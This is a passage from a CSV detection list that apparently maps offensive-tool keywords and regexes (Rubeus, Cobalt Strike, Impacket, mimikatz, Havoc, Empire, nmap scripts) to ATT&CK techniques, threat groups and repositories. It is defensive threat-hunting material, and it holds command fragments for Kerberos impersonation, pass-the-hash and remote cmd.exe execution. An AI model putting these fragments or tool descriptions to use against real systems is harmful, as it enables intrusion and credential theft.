Hak5.sh*",".{0,1000}\sHak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","1409" "* harvest * /monitorinterval:*",".{0,1000}\sharvest\s.{0,1000}\s\/monitorinterval\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1410" "* -hasbootstraphint *",".{0,1000}\s\-hasbootstraphint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1411" "* -hashes * -spn * -impersonate *",".{0,1000}\s\-hashes\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1412" "* -hashes lm:nt -gpo-id * -powershell *",".{0,1000}\s\-hashes\slm\:nt\s\-gpo\-id\s.{0,1000}\s\-powershell\s.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","N/A","8","5","416","48","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z","1413" "* --hash-type * --attack-mode *",".{0,1000}\s\-\-hash\-type\s.{0,1000}\s\-\-attack\-mode\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - 
T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1414" "* hashview.py*",".{0,1000}\shashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","1415" "* hashview-agent *",".{0,1000}\shashview\-agent\s.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","1416" "* havoc_bof.py*",".{0,1000}\shavoc_bof\.py.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","1417" "* havoc-client*",".{0,1000}\shavoc\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","1418" "* hbase-master-info.nse*",".{0,1000}\shbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1419" "* hbase-region-info.nse*",".{0,1000}\shbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1420" "* hddtemp-info.nse*",".{0,1000}\shddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1421" "* HiddenDesktop.cna*",".{0,1000}\sHiddenDesktop\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","1422" "* HijackDLL-Threads.dll*",".{0,1000}\sHijackDLL\-Threads\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","1423" "* hiphp-cli.sh*",".{0,1000}\shiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1424" "* hiphp-desktop.sh*",".{0,1000}\shiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1425" "* HiveDump.ps1*",".{0,1000}\sHiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1426" "* hnap-info.nse*",".{0,1000}\shnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1427" "* Ho, hey! I'm a DC :)*",".{0,1000}\sHo,\shey!\sI\'m\sa\sDC\s\:\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","1428" "* --hoax-port *",".{0,1000}\s\-\-hoax\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","1429" "* hollow.x64.*",".{0,1000}\shollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - 
APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","0","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","1430" "* --host * --port * --executable *.exe --command *cmd.exe*",".{0,1000}\s\-\-host\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe\s\-\-command\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1431" "* HostEnum.ps1*",".{0,1000}\sHostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1434" "* hostenum.py *",".{0,1000}\shostenum\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","1435" "* --host-file *.txt -u * --prompt --admin --no-banner*",".{0,1000}\s\-\-host\-file\s.{0,1000}\.txt\s\-u\s.{0,1000}\s\-\-prompt\s\-\-admin\s\-\-no\-banner.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","1436" "* hostmap-bfk.nse*",".{0,1000}\shostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1437" "* hostmap-crtsh.nse*",".{0,1000}\shostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1438" "* hostmap-robtex.nse*",".{0,1000}\shostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1439" "* HostRecon.ps1*",".{0,1000}\sHostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1441" "* -Hosts * -TopPorts *",".{0,1000}\s\-Hosts\s.{0,1000}\s\-TopPorts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Portscan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1442" "* hping3 *",".{0,1000}\shping3\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","1443" "* http://localhost:8080 -o agent*",".{0,1000}\shttp\:\/\/localhost\:8080\s\-o\sagent.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","1444" "* http_malleable*",".{0,1000}\shttp_malleable.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1445" "* --http-address 127.0.0.1:8181*",".{0,1000}\s\-\-http\-address\s127\.0\.0\.1\:8181.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","1446" "* http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\shttp\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1447" "* http-affiliate-id.nse*",".{0,1000}\shttp\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1448" "* http-apache-negotiation.nse*",".{0,1000}\shttp\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
